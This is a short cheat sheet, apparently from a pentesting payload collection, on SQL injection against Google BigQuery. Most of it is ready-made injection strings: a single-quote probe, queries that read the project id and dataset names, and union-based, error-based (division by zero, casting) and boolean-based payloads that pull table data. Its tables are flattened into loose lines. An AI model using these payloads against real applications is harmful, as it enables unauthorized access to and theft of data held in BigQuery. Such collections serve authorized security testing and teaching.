Google BigQuery SQL Injection
Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.
Summary
Detection
Use a classic single quote to trigger an error: '
Identify BigQuery using backtick notation: SELECT .... FROM `` AS ...
SQL Query
Description
SELECT @@project_id
Gathering project id
SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA
Gathering all dataset names
select * from project_id.dataset_name.table_name
Gathering data from specific project id & dataset
Type
Description
#
Hash comment
/* PostgreSQL Comment */
C-style comment
BigQuery Union Based
UNION ALL SELECT ( SELECT @@project_id ), 1 , 1 , 1 , 1 , 1 , 1 )) AS T1 GROUP BY column_name #
true ) GROUP BY column_name LIMIT 1 UNION ALL SELECT ( SELECT 'asd' ), 1 , 1 , 1 , 1 , 1 , 1 )) AS T1 GROUP BY column_name #
true ) GROUP BY column_name LIMIT 1 UNION ALL SELECT ( SELECT @@project_id ), 1 , 1 , 1 , 1 , 1 , 1 )) AS T1 GROUP BY column_name #
' GROUP BY column_name UNION ALL SELECT column_name , 1 , 1 FROM ( select column_name AS new_name from ` project_id . dataset_name . table_name `) AS A GROUP BY column_name #
BigQuery Error Based
SQL Query
Description
' OR if(1/(length((select('a')))-1)=1,true,false) OR '
Division by zero
select CAST(@@project_id AS INT64)
Casting
BigQuery Boolean Based
' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)=' A ' #
BigQuery Time Based
Time based functions does not exist in the BigQuery syntax.
References